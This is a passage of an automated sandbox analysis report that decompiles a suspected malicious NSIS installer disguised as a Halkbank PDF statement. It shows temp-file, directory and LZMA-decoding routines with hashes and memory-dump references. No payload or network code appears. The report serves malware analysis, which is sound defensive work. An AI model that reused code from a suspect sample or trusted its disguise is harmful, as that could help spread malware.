                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer$CountTick
                                                                    • String ID: D=A
                                                                    • API String ID: 1092082344-3823224246
                                                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                                                                    C-Code - Quality: 100%
                                                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                    				intOrPtr _v8;
                                                                    				short _v12;
                                                                    				short _t12;
                                                                    				intOrPtr _t13;
                                                                    				signed int _t14;
                                                                    				WCHAR* _t17;
                                                                    				signed int _t19;
                                                                    				signed short _t23;
                                                                    				WCHAR* _t26;
                                                                    
                                                                    				_t26 = _a4;
                                                                    				_t23 = 0x64;
                                                                    				while(1) {
                                                                    					_t12 =  *L"nsa"; // 0x73006e
                                                                    					_t23 = _t23 - 1;
                                                                    					_v12 = _t12;
                                                                    					_t13 =  *0x40a5ac; // 0x61
                                                                    					_v8 = _t13;
                                                                    					_t14 = GetTickCount();
                                                                    					_t19 = 0x1a;
                                                                    					_v8 = _v8 + _t14 % _t19;
                                                                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                    					if(_t17 != 0) {
                                                                    						break;
                                                                    					}
                                                                    					if(_t23 != 0) {
                                                                    						continue;
                                                                    					} else {
                                                                    						 *_t26 =  *_t26 & _t23;
                                                                    					}
                                                                    					L4:
                                                                    					return _t17;
                                                                    				}
                                                                    				_t17 = _t26;
                                                                    				goto L4;
                                                                    			}












                                                                    0x0040618d
                                                                    0x00406193
                                                                    0x00406194
                                                                    0x00406194
                                                                    0x00406199
                                                                    0x0040619a
                                                                    0x0040619d
                                                                    0x004061a2
                                                                    0x004061a5
                                                                    0x004061af
                                                                    0x004061bc
                                                                    0x004061c0
                                                                    0x004061c8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004061cc
                                                                    0x00000000
                                                                    0x004061ce
                                                                    0x004061ce
                                                                    0x004061ce
                                                                    0x004061d1
                                                                    0x004061d4
                                                                    0x004061d4
                                                                    0x004061d7
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004061A5
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-44229769
                                                                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                                                                    C-Code - Quality: 100%
                                                                    			E00403C25() {
                                                                    				void* _t1;
                                                                    				void* _t2;
                                                                    				void* _t4;
                                                                    				signed int _t11;
                                                                    
                                                                    				_t1 =  *0x40a018; // 0xffffffff
                                                                    				if(_t1 != 0xffffffff) {
                                                                    					CloseHandle(_t1);
                                                                    					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                    				}
                                                                    				_t2 =  *0x40a01c; // 0xffffffff
                                                                    				if(_t2 != 0xffffffff) {
                                                                    					CloseHandle(_t2);
                                                                    					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                    					_t11 =  *0x40a01c;
                                                                    				}
                                                                    				E00403C82();
                                                                    				_t4 = E00405D74(_t11, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\nsr4AC7.tmp\\", 7); // executed
                                                                    				return _t4;
                                                                    			}







                                                                    0x00403c25
                                                                    0x00403c34
                                                                    0x00403c37
                                                                    0x00403c39
                                                                    0x00403c39
                                                                    0x00403c40
                                                                    0x00403c48
                                                                    0x00403c4b
                                                                    0x00403c4d
                                                                    0x00403c4d
                                                                    0x00403c4d
                                                                    0x00403c54
                                                                    0x00403c60
                                                                    0x00403c66

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\, xrefs: 00403C5B
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr4AC7.tmp\
                                                                    • API String ID: 2962429428-515100788
                                                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 672 4015c1-4015d5 call 402da6 call 405fe2 677 401631-401634 672->677 678 4015d7-4015ea call 405f64 672->678 679 401663-4022f6 call 401423 677->679 680 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 677->680 685 401604-401607 call 405c16 678->685 686 4015ec-4015ef 678->686 696 402c2a-402c39 679->696 697 40292e-402935 679->697 680->696 699 40165b-40165e 680->699 695 40160c-40160e 685->695 686->685 689 4015f1-4015f8 call 405c33 686->689 689->685 703 4015fa-4015fd call 405b99 689->703 701 401610-401615 695->701 702 401627-40162f 695->702 697->696 699->696 705 401624 701->705 706 401617-401622 GetFileAttributesW 701->706 702->677 702->678 708 401602 703->708 705->702 706->702 706->705 708->695
                                                                    C-Code - Quality: 86%
                                                                    			E004015C1(short __ebx, void* __eflags) {
                                                                    				void* _t17;
                                                                    				int _t23;
                                                                    				void* _t25;
                                                                    				signed char _t26;
                                                                    				short _t28;
                                                                    				short _t31;
                                                                    				short* _t34;
                                                                    				void* _t36;
                                                                    
                                                                    				_t28 = __ebx;
                                                                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                    				_t17 = E00405FE2(_t16);
                                                                    				_t32 = _t17;
                                                                    				if(_t17 != __ebx) {
                                                                    					do {
                                                                    						_t34 = E00405F64(_t32, 0x5c);
                                                                    						_t31 =  *_t34;
                                                                    						 *_t34 = _t28;
                                                                    						if(_t31 != _t28) {
                                                                    							L5:
                                                                    							_t25 = E00405C16( *(_t36 + 8));
                                                                    						} else {
                                                                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                                    							}
                                                                    						}
                                                                    						if(_t25 != _t28) {
                                                                    							if(_t25 != 0xb7) {
                                                                    								L9:
                                                                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                    							} else {
                                                                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                    								if((_t26 & 0x00000010) == 0) {
                                                                    									goto L9;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						 *_t34 = _t31;
                                                                    						_t32 = _t34 + 2;
                                                                    					} while (_t31 != _t28);
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                    					_push(0xfffffff5);
                                                                    					E00401423();
                                                                    				} else {
                                                                    					E00401423(0xffffffe6);
                                                                    					E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                    					if(_t23 == 0) {
                                                                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                    					}
                                                                    				}
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                    				return 0;
                                                                    			}











                                                                    0x004015c1
                                                                    0x004015c9
                                                                    0x004015cc
                                                                    0x004015d1
                                                                    0x004015d5
                                                                    0x004015d7
                                                                    0x004015df
                                                                    0x004015e1
                                                                    0x004015e4
                                                                    0x004015ea
                                                                    0x00401604
                                                                    0x00401607
                                                                    0x004015ec
                                                                    0x004015ec
                                                                    0x004015ef
                                                                    0x00000000
                                                                    0x004015fa
                                                                    0x004015fd
                                                                    0x004015fd
                                                                    0x004015ef
                                                                    0x0040160e
                                                                    0x00401615
                                                                    0x00401624
                                                                    0x00401624
                                                                    0x00401617
                                                                    0x0040161a
                                                                    0x00401622
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401622
                                                                    0x00401615
                                                                    0x00401627
                                                                    0x0040162b
                                                                    0x0040162c
                                                                    0x004015d7
                                                                    0x00401634
                                                                    0x00401663
                                                                    0x004022f1
                                                                    0x00401636
                                                                    0x00401638
                                                                    0x00401645
                                                                    0x0040164d
                                                                    0x00401655
                                                                    0x0040165b
                                                                    0x0040165b
                                                                    0x00401655
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 1892508949-1943935188
                                                                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 709 40603f-40605a call 406668 call 405fe2 714 406060-40606d call 4068ef 709->714 715 40605c-40605e 709->715 719 40607d-406081 714->719 720 40606f-406075 714->720 716 4060b8-4060ba 715->716 722 406097-4060a0 lstrlenW 719->722 720->715 721 406077-40607b 720->721 721->715 721->719 723 4060a2-4060b6 call 405f37 GetFileAttributesW 722->723 724 406083-40608a call 40699e 722->724 723->716 729 406091-406092 call 405f83 724->729 730 40608c-40608f 724->730 729->722 730->715 730->729
                                                                    C-Code - Quality: 53%
                                                                    			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                    				int _t11;
                                                                    				signed char* _t12;
                                                                    				long _t16;
                                                                    				intOrPtr _t18;
                                                                    				intOrPtr* _t21;
                                                                    				signed int _t23;
                                                                    
                                                                    				E00406668(0x425f50, _a4);
                                                                    				_t21 = E00405FE2(0x425f50);
                                                                    				if(_t21 != 0) {
                                                                    					E004068EF(_t21);
                                                                    					if(( *0x42a278 & 0x00000080) == 0) {
                                                                    						L5:
                                                                    						_t23 = _t21 - 0x425f50 >> 1;
                                                                    						while(1) {
                                                                    							_t11 = lstrlenW(0x425f50);
                                                                    							_push(0x425f50);
                                                                    							if(_t11 <= _t23) {
                                                                    								break;
                                                                    							}
                                                                    							_t12 = E0040699E();
                                                                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                    								E00405F83(0x425f50);
                                                                    								continue;
                                                                    							} else {
                                                                    								goto L1;
                                                                    							}
                                                                    						}
                                                                    						E00405F37();
                                                                    						_t16 = GetFileAttributesW(??); // executed
                                                                    						return 0 | _t16 != 0xffffffff;
                                                                    					}
                                                                    					_t18 =  *_t21;
                                                                    					if(_t18 == 0 || _t18 == 0x5c) {
                                                                    						goto L1;
                                                                    					} else {
                                                                    						goto L5;
                                                                    					}
                                                                    				}
                                                                    				L1:
                                                                    				return 0;
                                                                    			}









                                                                    0x0040604b
                                                                    0x00406056
                                                                    0x0040605a
                                                                    0x00406061
                                                                    0x0040606d
                                                                    0x0040607d
                                                                    0x0040607f
                                                                    0x00406097
                                                                    0x00406098
                                                                    0x0040609f
                                                                    0x004060a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406083
                                                                    0x0040608a
                                                                    0x00406092
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040608a
                                                                    0x004060a2
                                                                    0x004060a8
                                                                    0x00000000
                                                                    0x004060b6
                                                                    0x0040606f
                                                                    0x00406075
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406075
                                                                    0x0040605c
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00406098
                                                                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004060A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: P_B
                                                                    • API String ID: 3248276644-906794629
                                                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 732 407194-40719a 733 40719c-40719e 732->733 734 40719f-4071bd 732->734 733->734 735 407490-40749d 734->735 736 4073cb-4073e0 734->736 739 4074c7-4074cb 735->739 737 4073e2-4073f8 736->737 738 4073fa-407410 736->738 740 407413-40741a 737->740 738->740 741 40752b-40753e 739->741 742 4074cd-4074ee 739->742 743 407441 740->743 744 40741c-407420 740->744 747 407447-40744d 741->747 745 4074f0-407505 742->745 746 407507-40751a 742->746 743->747 748 407426-40743e 744->748 749 4075cf-4075d9 744->749 750 40751d-407524 745->750 746->750 752 406bf2 747->752 753 4075fa 747->753 748->743 754 4075e5-4075f8 749->754 755 4074c4 750->755 756 407526 750->756 757 406bf9-406bfd 752->757 758 406d39-406d5a 752->758 759 406c9e-406ca2 752->759 760 406d0e-406d12 752->760 762 4075fd-407601 753->762 754->762 755->739 763 4074a9-4074c1 756->763 764 4075db 756->764 757->754 765 406c03-406c10 757->765 758->736 768 406ca8-406cc1 759->768 769 40754e-407558 759->769 766 406d18-406d2c 760->766 767 40755d-407567 760->767 763->755 764->754 765->753 770 406c16-406c5c 765->770 771 406d2f-406d37 766->771 767->754 772 406cc4-406cc8 768->772 769->754 773 406c84-406c86 770->773 774 406c5e-406c62 770->774 771->758 771->760 772->759 775 406cca-406cd0 772->775 780 406c94-406c9c 773->780 781 406c88-406c92 773->781 778 406c64-406c67 GlobalFree 774->778 779 406c6d-406c7b GlobalAlloc 774->779 776 406cd2-406cd9 775->776 777 406cfa-406d0c 775->777 782 406ce4-406cf4 GlobalAlloc 776->782 783 406cdb-406cde GlobalFree 776->783 777->771 778->779 779->753 784 406c81 779->784 780->772 781->780 781->781 782->753 782->777 783->782 784->773
                                                                    C-Code - Quality: 99%
                                                                    			E00407194() {
                                                                    				signed int _t530;
                                                                    				void _t537;
                                                                    				signed int _t538;
                                                                    				signed int _t539;
                                                                    				unsigned short _t569;
                                                                    				signed int _t579;
                                                                    				signed int _t607;
                                                                    				void* _t627;
                                                                    				signed int _t628;
                                                                    				signed int _t635;
                                                                    				signed int* _t643;
                                                                    				void* _t644;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					_t530 =  *(_t644 - 0x30);
                                                                    					if(_t530 >= 4) {
                                                                    					}
                                                                    					 *(_t644 - 0x40) = 6;
                                                                    					 *(_t644 - 0x7c) = 0x19;
                                                                    					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                    					while(1) {
                                                                    						L145:
                                                                    						 *(_t644 - 0x50) = 1;
                                                                    						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                    						while(1) {
                                                                    							L149:
                                                                    							if( *(_t644 - 0x48) <= 0) {
                                                                    								goto L155;
                                                                    							}
                                                                    							L150:
                                                                    							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                    							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                    							 *(_t644 - 0x54) = _t643;
                                                                    							_t569 =  *_t643;
                                                                    							_t635 = _t569 & 0x0000ffff;
                                                                    							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                    							if( *(_t644 - 0xc) >= _t607) {
                                                                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                    								_t628 = _t627 + 1;
                                                                    								 *_t643 = _t569 - (_t569 >> 5);
                                                                    								 *(_t644 - 0x50) = _t628;
                                                                    							} else {
                                                                    								 *(_t644 - 0x10) = _t607;
                                                                    								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                    								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                    							}
                                                                    							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                    								L148:
                                                                    								_t487 = _t644 - 0x48;
                                                                    								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                    								L149:
                                                                    								if( *(_t644 - 0x48) <= 0) {
                                                                    									goto L155;
                                                                    								}
                                                                    								goto L150;
                                                                    							} else {
                                                                    								L154:
                                                                    								L146:
                                                                    								if( *(_t644 - 0x6c) == 0) {
                                                                    									L169:
                                                                    									 *(_t644 - 0x88) = 0x18;
                                                                    									L170:
                                                                    									_t579 = 0x22;
                                                                    									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                    									_t539 = 0;
                                                                    									L172:
                                                                    									return _t539;
                                                                    								}
                                                                    								L147:
                                                                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                    								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                    								_t484 = _t644 - 0x70;
                                                                    								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                    								goto L148;
                                                                    							}
                                                                    							L155:
                                                                    							_t537 =  *(_t644 - 0x7c);
                                                                    							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                    							while(1) {
                                                                    								L140:
                                                                    								 *(_t644 - 0x88) = _t537;
                                                                    								while(1) {
                                                                    									L1:
                                                                    									_t538 =  *(_t644 - 0x88);
                                                                    									if(_t538 > 0x1c) {
                                                                    										break;
                                                                    									}
                                                                    									L2:
                                                                    									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                    										case 0:
                                                                    											L3:
                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                    												goto L170;
                                                                    											}
                                                                    											L4:
                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                    											_t538 =  *( *(_t644 - 0x70));
                                                                    											if(_t538 > 0xe1) {
                                                                    												goto L171;
                                                                    											}
                                                                    											L5:
                                                                    											_t542 = _t538 & 0x000000ff;
                                                                    											_push(0x2d);
                                                                    											asm("cdq");
                                                                    											_pop(_t581);
                                                                    											_push(9);
                                                                    											_pop(_t582);
                                                                    											_t638 = _t542 / _t581;
                                                                    											_t544 = _t542 % _t581 & 0x000000ff;
                                                                    											asm("cdq");
                                                                    											_t633 = _t544 % _t582 & 0x000000ff;
                                                                    											 *(_t644 - 0x3c) = _t633;
                                                                    											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                    											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                    											_t641 = (0x300 << _t633 + _t638) + 0x736;
